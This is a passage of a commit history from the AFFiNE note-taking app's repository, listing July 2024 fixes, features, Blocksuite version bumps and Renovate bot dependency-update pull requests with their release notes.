2024-07-23 10:39:34 +00:00
forehalo
14fbeb7879
fix(server): should clean bill date if lifetime subscription ( #7577 )
2024-07-23 08:19:28 +00:00
Brooooooklyn
dc7eeedb24
ci: set the sentry release name as version number ( #7574 )
2024-07-23 08:05:05 +00:00
Cats Juice
d7cc546f58
fix(core): correct believer plan copy ( #7571 )
2024-07-23 10:11:07 +08:00
darkskygit
386d766597
fix: forked session query condition ( #7568 )
2024-07-22 12:28:05 +00:00
darkskygit
7d7399a9eb
chore: update name in one shot ( #7567 )
2024-07-22 11:03:41 +00:00
JimmFly
55db9f9719
feat(component): add animations to modal ( #7474 )
...
Add opening and closing animations to modal.
The usage of conditional rendering as shown below is not recommended:
```
open ? (
<Modal
open={open}
...
/>
) : null,
```
When the modal is closed, it gets removed from the DOM instantly without running any exit animations that might be defined in the Modal component.
2024-07-22 03:22:42 +00:00
JimmFly
e3c3d1ac69
fix(core): values in edit not saved when closing info modal ( #7465 )
...
Before the modification, when the modal is closed, if a value is being edited, the input's on blur event cannot be triggered to automatically save.
https://github.com/toeverything/AFFiNE/assets/102217452/60235cec-0022-4c4d-b213-28f2331a0c5b
2024-07-22 03:22:40 +00:00
Saul-Mirone
bd0279730c
chore: bump blocksuite canary ( #7558 )
...
## Features
## Bugfix
## Refactor
- https://github.com/toeverything/BlockSuite/pull/7697 @Saul-Mirone
## Misc
2024-07-20 09:14:16 +00:00
Saul-Mirone
988f3a39f8
chore: bump blocksuite again ( #7557 )
...
## Features
## Bugfix
- https://github.com/toeverything/BlockSuite/pull/7686 @Flrande
- https://github.com/toeverything/BlockSuite/pull/7692 @Saul-Mirone
## Refactor
## Misc
2024-07-19 15:37:10 +00:00
JimmFly
f65380f847
feat(templates): add arrows stickers ( #7518 )
...
Add the arrow SVGs from [handy-arrows](https://github.com/Eronred/handy-arrows ) to the template.
Thanks to [handy-arrows](https://github.com/Eronred/handy-arrows ) for these beautiful SVGs.
2024-07-19 06:25:30 +00:00
donteatfriedrice
a62b7f0024
fix: chat panel ai onboarding title wrap ( #7552 )
...
[BS-896](https://linear.app/affine-design/issue/BS-896/ai-chat-onboarding-ui-折行-bug )
2024-07-19 05:55:21 +00:00
JimmFly
4512a1a91d
fix(core): cmdk unexpected highlighting style ( #7538 )
...
close PD-1428
https://github.com/user-attachments/assets/6bb02547-6030-474d-ada0-c5a49be309d6
2024-07-19 05:38:33 +00:00
JimmFly
af7d44164c
fix(core): bi-directional links responsive style ( #7540 )
...
close AF-1077
2024-07-19 05:22:34 +00:00
Saul-Mirone
6dbcb62da7
chore: bump blocksuite ( #7546 )
...
## Features
- https://github.com/toeverything/BlockSuite/pull/7659 @donteatfriedrice
## Bugfix
- https://github.com/toeverything/BlockSuite/pull/7682 @Saul-Mirone
- https://github.com/toeverything/BlockSuite/pull/7641 @Saul-Mirone
- https://github.com/toeverything/BlockSuite/pull/7685 @Saul-Mirone
- https://github.com/toeverything/BlockSuite/pull/7680 @Saul-Mirone
- https://github.com/toeverything/BlockSuite/pull/7679 @Saul-Mirone
- https://github.com/toeverything/BlockSuite/pull/7676 @Saul-Mirone
- https://github.com/toeverything/BlockSuite/pull/7675 @Saul-Mirone
- https://github.com/toeverything/BlockSuite/pull/7670 @Saul-Mirone
- https://github.com/toeverything/BlockSuite/pull/7672 @Saul-Mirone
- https://github.com/toeverything/BlockSuite/pull/7668 @Saul-Mirone
- https://github.com/toeverything/BlockSuite/pull/7664 @Saul-Mirone
- https://github.com/toeverything/BlockSuite/pull/7665 @Saul-Mirone
- https://github.com/toeverything/BlockSuite/pull/7662 @Saul-Mirone
- https://github.com/toeverything/BlockSuite/pull/7658 @Saul-Mirone
- https://github.com/toeverything/BlockSuite/pull/7654 @Saul-Mirone
- https://github.com/toeverything/BlockSuite/pull/7648 @undefined
- https://github.com/toeverything/BlockSuite/pull/7653 @Saul-Mirone
- https://github.com/toeverything/BlockSuite/pull/7651 @Saul-Mirone
- https://github.com/toeverything/BlockSuite/pull/7647 @Saul-Mirone
- https://github.com/toeverything/BlockSuite/pull/7671 @zzj3720
- https://github.com/toeverything/BlockSuite/pull/7656 @zzj3720
- https://github.com/toeverything/BlockSuite/pull/7643 @Saul-Mirone
- https://github.com/toeverything/BlockSuite/pull/7666 @doodlewind
- https://github.com/toeverything/BlockSuite/pull/7645 @Saul-Mirone
- https://github.com/toeverything/BlockSuite/pull/7637 @zzj3720
- https://github.com/toeverything/BlockSuite/pull/7639 @Saul-Mirone
- https://github.com/toeverything/BlockSuite/pull/7636 @Saul-Mirone
- https://github.com/toeverything/BlockSuite/pull/7633 @Saul-Mirone
- https://github.com/toeverything/BlockSuite/pull/7630 @Saul-Mirone
- https://github.com/toeverything/BlockSuite/pull/7629 @Saul-Mirone
- https://github.com/toeverything/BlockSuite/pull/7627 @Saul-Mirone
- https://github.com/toeverything/BlockSuite/pull/7625 @Saul-Mirone
- https://github.com/toeverything/BlockSuite/pull/7623 @Saul-Mirone
- https://github.com/toeverything/BlockSuite/pull/7599 @L-Sun
- https://github.com/toeverything/BlockSuite/pull/7621 @Saul-Mirone
- https://github.com/toeverything/BlockSuite/pull/7619 @Saul-Mirone
- https://github.com/toeverything/BlockSuite/pull/7614 @Saul-Mirone
- https://github.com/toeverything/BlockSuite/pull/7613 @Saul-Mirone
- https://github.com/toeverything/BlockSuite/pull/7611 @Saul-Mirone
- https://github.com/toeverything/BlockSuite/pull/7609 @Saul-Mirone
- https://github.com/toeverything/BlockSuite/pull/7594 @fundon
- https://github.com/toeverything/BlockSuite/pull/7593 @fundon
## Refactor
- https://github.com/toeverything/BlockSuite/pull/7634 @zzj3720
- https://github.com/toeverything/BlockSuite/pull/7616 @zzj3720
- https://github.com/toeverything/BlockSuite/pull/7617 @zzj3720
- https://github.com/toeverything/BlockSuite/pull/7603 @Saul-Mirone
## Misc
- https://github.com/toeverything/BlockSuite/pull/7604 @Saul-Mirone
## Features
## Bugfix
- https://github.com/toeverything/BlockSuite/pull/7688 @fourdim
- https://github.com/toeverything/BlockSuite/pull/7690 @Saul-Mirone
## Refactor
## Misc
2024-07-19 05:06:26 +00:00
CatsJuice
239de4c283
feat(core): reuse select-page for edit collection pages-mode ( #7548 )
2024-07-19 04:47:48 +00:00
liuyi
544236f1a0
fix: separate public domain for beta assets ( #7550 )
2024-07-19 12:45:26 +08:00
darkskygit
145872b9f4
chore: refresh unnamed user ( #7544 )
2024-07-19 04:01:39 +00:00
forehalo
90c00b6db9
Revert "fix(server): wrong usage of optl ( #6714 )"
...
This reverts commit 4868f6e611 .
2024-07-19 11:31:01 +08:00
darkskygit
585003640f
feat: improve workflow performance ( #7539 )
2024-07-18 10:37:27 +00:00
liuyi
9440dc8dd5
fix: separate beta and stable assets ( #7543 )
2024-07-18 10:32:40 +00:00
EYHN
9fe77baf05
feat(infra): better orm ( #7502 )
2024-07-18 10:14:12 +00:00
forehalo
133888d760
fix(core): remove useless logic of use favorite ( #7533 )
...
closes https://github.com/toeverything/AFFiNE/issues/7534
2024-07-18 08:08:24 +00:00
L-Sun
9160469a18
fix(core): can not preview image in shared page ( #7466 )
...
FIx BS-798
2024-07-18 06:33:52 +00:00
renovate
71ddb1f841
chore: bump up oxlint version to v0.6.1 ( #7528 )
...
[](https://renovatebot.com )
This PR contains the following updates:
| Package | Change | Age | Adoption | Passing | Confidence |
|---|---|---|---|---|---|
| [oxlint](https://oxc.rs ) ([source](https://togithub.com/oxc-project/oxc/tree/HEAD/npm/oxlint )) | [`0.6.0` -> `0.6.1`](https://renovatebot.com/diffs/npm/oxlint/0.6.0/0.6.1 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) |
---
### Release Notes
<details>
<summary>oxc-project/oxc (oxlint)</summary>
### [`v0.6.1`](4f26e51b74...697c0efdef )
[Compare Source](4f26e51b74...697c0efdef )
</details>
---
### Configuration
📅 **Schedule**: Branch creation - At any time (no schedule defined), Automerge - At any time (no schedule defined).
🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied.
♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.
🔕 **Ignore**: Close this PR and you won't be reminded about this update again.
---
- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box
---
This PR has been generated by [Mend Renovate](https://www.mend.io/free-developer-tools/renovate/ ). View repository job log [here](https://developer.mend.io/github/toeverything/AFFiNE ).
<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiIzNy40MzEuNCIsInVwZGF0ZWRJblZlciI6IjM3LjQzMS40IiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==-->
2024-07-18 04:34:20 +00:00
CatsJuice
4f718cffbf
feat(core): subscribe changed notification and typeform link ( #7522 )
2024-07-18 04:20:21 +00:00
CatsJuice
b9d84fe007
fix(core): select page modal's list is not visiable ( #7531 )
...
fix AF-1076

2024-07-18 04:06:02 +00:00
renovate
ad970837ec
chore: bump up @blocksuite/icons version to v2.1.59 ( #7525 )
...
[](https://renovatebot.com )
This PR contains the following updates:
| Package | Change | Age | Adoption | Passing | Confidence |
|---|---|---|---|---|---|
| [@blocksuite/icons](https://togithub.com/toeverything/icons ) | [`2.1.58` -> `2.1.59`](https://renovatebot.com/diffs/npm/@blocksuite%2ficons/2.1.58/2.1.59 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) |
---
### Release Notes
<details>
<summary>toeverything/icons (@​blocksuite/icons)</summary>
### [`v2.1.59`](961ed351ea...e3b1e36db1 )
[Compare Source](961ed351ea...e3b1e36db1 )
</details>
---
### Configuration
📅 **Schedule**: Branch creation - At any time (no schedule defined), Automerge - At any time (no schedule defined).
🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied.
♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.
🔕 **Ignore**: Close this PR and you won't be reminded about these updates again.
---
- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box
---
This PR has been generated by [Mend Renovate](https://www.mend.io/free-developer-tools/renovate/ ). View repository job log [here](https://developer.mend.io/github/toeverything/AFFiNE ).
<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiIzNy40MzEuNCIsInVwZGF0ZWRJblZlciI6IjM3LjQzMS40IiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==-->
2024-07-18 03:44:56 +00:00
Peng Xiao
d168128174
fix(core): workaround for center peek styles ( #7532 )
2024-07-18 11:43:42 +08:00
renovate
2919d4912c
chore: bump up react-i18next version to v15 ( #7529 )
...
[](https://renovatebot.com )
This PR contains the following updates:
| Package | Change | Age | Adoption | Passing | Confidence |
|---|---|---|---|---|---|
| [react-i18next](https://togithub.com/i18next/react-i18next ) | [`^14.1.0` -> `^15.0.0`](https://renovatebot.com/diffs/npm/react-i18next/14.1.3/15.0.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) |
---
### Release Notes
<details>
<summary>i18next/react-i18next (react-i18next)</summary>
### [`v15.0.0`](https://togithub.com/i18next/react-i18next/blob/HEAD/CHANGELOG.md#1500 )
[Compare Source](https://togithub.com/i18next/react-i18next/compare/v14.1.3...v15.0.0 )
- use optional chaining, nullish coalescing and nullish coalescing assignment [1774](https://togithub.com/i18next/react-i18next/pull/1774 )
- Build config and optimizations [1769](https://togithub.com/i18next/react-i18next/pull/1769 )
- some dependency updates [1768](https://togithub.com/i18next/react-i18next/pull/1768 )
- use modern hasLoadedNamespace code (now requires at least i18next > v19.4.5 (introduced in june 2020))
</details>
---
### Configuration
📅 **Schedule**: Branch creation - At any time (no schedule defined), Automerge - At any time (no schedule defined).
🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied.
♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.
🔕 **Ignore**: Close this PR and you won't be reminded about this update again.
---
- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box
---
This PR has been generated by [Mend Renovate](https://www.mend.io/free-developer-tools/renovate/ ). View repository job log [here](https://developer.mend.io/github/toeverything/AFFiNE ).
<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiIzNy40MzEuNCIsInVwZGF0ZWRJblZlciI6IjM3LjQzMS40IiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==-->
2024-07-18 03:09:34 +00:00
DarkSky
dcb9d75db7
feat: allow sort and filter forked session ( #7519 )
2024-07-18 11:08:47 +08:00
Chen
ccac7a883c
feat: bump blocksuite ( #7526 )
2024-07-17 18:30:46 +08:00
Cats Juice
ade8db2aec
fix(core): adjust app-sidebar z-index ( #7523 )
2024-07-17 18:10:08 +08:00
Cats Juice
07d4c476c2
fix(core): right-sidebar header radio-group's indicator is missing ( #7524 )
2024-07-17 18:09:48 +08:00
Cats Juice
db3533724b
fix(core): resolve unexpected forwardRef warning ( #7527 )
2024-07-17 18:08:59 +08:00
forehalo
4868f6e611
fix(server): wrong usage of optl ( #6714 )
2024-07-17 08:17:14 +00:00
CatsJuice
08a0572d4e
fix(core): update pricing pages ( #7521 )
2024-07-17 08:01:13 +00:00
renovate
e97ac11d0f
chore: bump up oxlint version to v0.6.0 ( #7438 )
...
[](https://renovatebot.com )
This PR contains the following updates:
| Package | Change | Age | Adoption | Passing | Confidence |
|---|---|---|---|---|---|
| [oxlint](https://oxc.rs ) ([source](https://togithub.com/oxc-project/oxc/tree/HEAD/npm/oxlint )) | [`0.5.2` -> `0.6.0`](https://renovatebot.com/diffs/npm/oxlint/0.5.2/0.6.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) |
---
### Release Notes
<details>
<summary>oxc-project/oxc (oxlint)</summary>
### [`v0.6.0`](https://togithub.com/oxc-project/oxc/blob/HEAD/npm/oxlint/CHANGELOG.md#060---2024-07-11 )
[Compare Source](0c7f3eecc6...4f26e51b74 )
##### Features
- [`cc58614`](https://togithub.com/oxc-project/oxc/commit/cc58614 ) linter: Better schemas for allow/warn/deny ([#​4150](https://togithub.com/oxc-project/oxc/issues/4150 )) (DonIsaac)
### [`v0.5.3`](https://togithub.com/oxc-project/oxc/releases/tag/oxlint_v0.5.3 ): oxlint v0.5.3
[Compare Source](b66ad0b675...0c7f3eecc6 )
#### \[0.5.3] - 2024-07-07
##### Features
- [`1681b11`](https://togithub.com/oxc-project/oxc/commit/1681b11 ) linter: Eslint-plugin-jest/consistent-test-it ([#​4053](https://togithub.com/oxc-project/oxc/issues/4053 )) (cinchen)
- [`6876490`](https://togithub.com/oxc-project/oxc/commit/6876490 ) linter: Add rule no-undefined ([#​4041](https://togithub.com/oxc-project/oxc/issues/4041 )) (jordan boyer)
- [`bf04dee`](https://togithub.com/oxc-project/oxc/commit/bf04dee ) linter: Implement unicorn/no-negation-in-equality-check ([#​4034](https://togithub.com/oxc-project/oxc/issues/4034 )) (Nissim Chekroun)
- [`aa45604`](https://togithub.com/oxc-project/oxc/commit/aa45604 ) linter/eslint: Implement no-multi-str ([#​4038](https://togithub.com/oxc-project/oxc/issues/4038 )) (Jelle van der Waa)
##### Bug Fixes
- [`7b2dc3b`](https://togithub.com/oxc-project/oxc/commit/7b2dc3b ) linter: Fix panic in import/namespace ([#​4080](https://togithub.com/oxc-project/oxc/issues/4080 )) (Boshen)
</details>
---
### Configuration
📅 **Schedule**: Branch creation - At any time (no schedule defined), Automerge - At any time (no schedule defined).
🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied.
♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.
🔕 **Ignore**: Close this PR and you won't be reminded about this update again.
---
- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box
---
This PR has been generated by [Mend Renovate](https://www.mend.io/free-developer-tools/renovate/ ). View repository job log [here](https://developer.mend.io/github/toeverything/AFFiNE ).
<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiIzNy40MjEuOSIsInVwZGF0ZWRJblZlciI6IjM3LjQyNS4xIiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==-->
2024-07-16 08:40:16 +00:00
renovate
7f9d321d9c
chore: bump up glob version to v11 ( #7451 )
...
[](https://renovatebot.com )
This PR contains the following updates:
| Package | Change | Age | Adoption | Passing | Confidence |
|---|---|---|---|---|---|
| [glob](https://togithub.com/isaacs/node-glob ) | [`^10.3.12` -> `^11.0.0`](https://renovatebot.com/diffs/npm/glob/10.4.3/11.0.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) |
---
### Release Notes
<details>
<summary>isaacs/node-glob (glob)</summary>
### [`v11.0.0`](https://togithub.com/isaacs/node-glob/compare/v10.4.4...561601d9d14935970ea78b0c1ca3a25addbf5379 )
[Compare Source](https://togithub.com/isaacs/node-glob/compare/v10.4.5...v11.0.0 )
### [`v10.4.5`](https://togithub.com/isaacs/node-glob/compare/v10.4.4...v10.4.5 )
[Compare Source](https://togithub.com/isaacs/node-glob/compare/v10.4.4...v10.4.5 )
### [`v10.4.4`](https://togithub.com/isaacs/node-glob/compare/v10.4.3...v10.4.4 )
[Compare Source](https://togithub.com/isaacs/node-glob/compare/v10.4.3...v10.4.4 )
</details>
---
### Configuration
📅 **Schedule**: Branch creation - At any time (no schedule defined), Automerge - At any time (no schedule defined).
🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied.
♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.
🔕 **Ignore**: Close this PR and you won't be reminded about this update again.
---
- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box
---
This PR has been generated by [Mend Renovate](https://www.mend.io/free-developer-tools/renovate/ ). View repository job log [here](https://developer.mend.io/github/toeverything/AFFiNE ).
<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiIzNy40MjUuMSIsInVwZGF0ZWRJblZlciI6IjM3LjQyNS4xIiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==-->
2024-07-16 08:24:01 +00:00
renovate
85a02b74f9
chore: bump up all non-major dependencies ( #7508 )
...
[](https://renovatebot.com )
This PR contains the following updates:
| Package | Change | Age | Adoption | Passing | Confidence | Type | Update |
|---|---|---|---|---|---|---|---|
| [@aws-sdk/client-s3](https://togithub.com/aws/aws-sdk-js-v3/tree/main/clients/client-s3 ) ([source](https://togithub.com/aws/aws-sdk-js-v3/tree/HEAD/clients/client-s3 )) | [`3.609.0` -> `3.614.0`](https://renovatebot.com/diffs/npm/@aws-sdk%2fclient-s3/3.609.0/3.614.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | minor |
| [@fal-ai/serverless-client](https://togithub.com/fal-ai/fal-js ) ([source](https://togithub.com/fal-ai/fal-js/tree/HEAD/libs/client )) | [`^0.12.0` -> `^0.13.0`](https://renovatebot.com/diffs/npm/@fal-ai%2fserverless-client/0.12.0/0.13.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | minor |
| [@google-cloud/opentelemetry-cloud-monitoring-exporter](https://togithub.com/GoogleCloudPlatform/opentelemetry-operations-js ) | [`^0.18.0` -> `^0.19.0`](https://renovatebot.com/diffs/npm/@google-cloud%2fopentelemetry-cloud-monitoring-exporter/0.18.0/0.19.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | minor |
| [@napi-rs/cli](https://togithub.com/napi-rs/napi-rs ) | [`3.0.0-alpha.56` -> `3.0.0-alpha.60`](https://renovatebot.com/diffs/npm/@napi-rs%2fcli/3.0.0-alpha.56/3.0.0-alpha.60 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | patch |
| [@nx/vite](https://nx.dev ) ([source](https://togithub.com/nrwl/nx/tree/HEAD/packages/vite )) | [`19.4.1` -> `19.4.3`](https://renovatebot.com/diffs/npm/@nx%2fvite/19.4.1/19.4.3 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | patch |
| [@playwright/test](https://playwright.dev ) ([source](https://togithub.com/microsoft/playwright )) | [`=1.44.1` -> `=1.45.1`](https://renovatebot.com/diffs/npm/@playwright%2ftest/1.44.1/1.45.1 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | minor |
| [electron](https://togithub.com/electron/electron ) | [`~30.1.0` -> `~30.2.0`](https://renovatebot.com/diffs/npm/electron/30.1.2/30.2.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | minor |
| [jotai-scope](https://togithub.com/jotaijs/jotai-scope ) | [`^0.6.0` -> `^0.7.0`](https://renovatebot.com/diffs/npm/jotai-scope/0.6.0/0.7.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | minor |
| [lucide-react](https://lucide.dev ) ([source](https://togithub.com/lucide-icons/lucide/tree/HEAD/packages/lucide-react )) | [`^0.400.0` -> `^0.408.0`](https://renovatebot.com/diffs/npm/lucide-react/0.400.0/0.408.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | minor |
| [napi](https://togithub.com/napi-rs/napi-rs ) | `3.0.0-alpha.5` -> `3.0.0-alpha.7` | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | workspace.dependencies | patch |
| [napi-derive](https://togithub.com/napi-rs/napi-rs ) | `3.0.0-alpha.4` -> `3.0.0-alpha.6` | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | workspace.dependencies | patch |
| [node](https://nodejs.org ) ([source](https://togithub.com/nodejs/node )) | `20.15.0` -> `20.15.1` | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | | patch |
| [playwright](https://playwright.dev ) ([source](https://togithub.com/microsoft/playwright )) | [`=1.44.1` -> `=1.45.1`](https://renovatebot.com/diffs/npm/playwright/1.44.1/1.45.1 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | minor |
| [react-i18next](https://togithub.com/i18next/react-i18next ) | [`14.1.2` -> `14.1.3`](https://renovatebot.com/diffs/npm/react-i18next/14.1.2/14.1.3 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | patch |
| [serde](https://serde.rs ) ([source](https://togithub.com/serde-rs/serde )) | `1.0.203` -> `1.0.204` | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | workspace.dependencies | patch |
| [storybook-dark-mode](https://togithub.com/hipstersmoothie/storybook-dark-mode ) | [`4.0.1` -> `4.0.2`](https://renovatebot.com/diffs/npm/storybook-dark-mode/4.0.1/4.0.2 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | patch |
| [tailwindcss](https://tailwindcss.com ) ([source](https://togithub.com/tailwindlabs/tailwindcss )) | [`3.4.4` -> `3.4.5`](https://renovatebot.com/diffs/npm/tailwindcss/3.4.4/3.4.5 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | patch |
| [uuid](https://togithub.com/uuid-rs/uuid ) | `1.9.1` -> `1.10.0` | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | workspace.dependencies | minor |
| [vitest-fetch-mock](https://togithub.com/IanVS/vitest-fetch-mock ) | [`^0.2.2` -> `^0.3.0`](https://renovatebot.com/diffs/npm/vitest-fetch-mock/0.2.2/0.3.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | minor |
| [vitest-mock-extended](https://togithub.com/eratio08/vitest-mock-extended ) | [`1.3.1` -> `1.3.2`](https://renovatebot.com/diffs/npm/vitest-mock-extended/1.3.1/1.3.2 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | patch |
---
### Release Notes
<details>
<summary>aws/aws-sdk-js-v3 (@​aws-sdk/client-s3)</summary>
### [`v3.614.0`](https://togithub.com/aws/aws-sdk-js-v3/blob/HEAD/clients/client-s3/CHANGELOG.md#36140-2024-07-10 )
[Compare Source](https://togithub.com/aws/aws-sdk-js-v3/compare/v3.613.0...v3.614.0 )
**Note:** Version bump only for package [@​aws-sdk/client-s3](https://togithub.com/aws-sdk/client-s3 )
### [`v3.613.0`](https://togithub.com/aws/aws-sdk-js-v3/blob/HEAD/clients/client-s3/CHANGELOG.md#36130-2024-07-09 )
[Compare Source](https://togithub.com/aws/aws-sdk-js-v3/compare/v3.609.0...v3.613.0 )
**Note:** Version bump only for package [@​aws-sdk/client-s3](https://togithub.com/aws-sdk/client-s3 )
</details>
<details>
<summary>fal-ai/fal-js (@​fal-ai/serverless-client)</summary>
### [`v0.13.0`](4ea43b4cea...cf300e9cc0 )
[Compare Source](4ea43b4cea...cf300e9cc0 )
</details>
<details>
<summary>GoogleCloudPlatform/opentelemetry-operations-js (@​google-cloud/opentelemetry-cloud-monitoring-exporter)</summary>
### [`v0.19.0`](https://togithub.com/GoogleCloudPlatform/opentelemetry-operations-js/compare/@google-cloud/opentelemetry-cloud-monitoring-exporter@0.18.0...@google-cloud/opentelemetry-cloud-monitoring-exporter@0.19.0 )
[Compare Source](https://togithub.com/GoogleCloudPlatform/opentelemetry-operations-js/compare/@google-cloud/opentelemetry-cloud-monitoring-exporter@0.18.0...@google-cloud/opentelemetry-cloud-monitoring-exporter@0.19.0 )
</details>
<details>
<summary>napi-rs/napi-rs (@​napi-rs/cli)</summary>
### [`v3.0.0-alpha.60`](https://togithub.com/napi-rs/napi-rs/compare/@napi-rs/cli@3.0.0-alpha.59...@napi-rs/cli@3.0.0-alpha.60 )
[Compare Source](https://togithub.com/napi-rs/napi-rs/compare/@napi-rs/cli@3.0.0-alpha.59...@napi-rs/cli@3.0.0-alpha.60 )
### [`v3.0.0-alpha.59`](https://togithub.com/napi-rs/napi-rs/releases/tag/%40napi-rs/cli%403.0.0-alpha.59 )
[Compare Source](https://togithub.com/napi-rs/napi-rs/compare/@napi-rs/cli@3.0.0-alpha.58...@napi-rs/cli@3.0.0-alpha.59 )
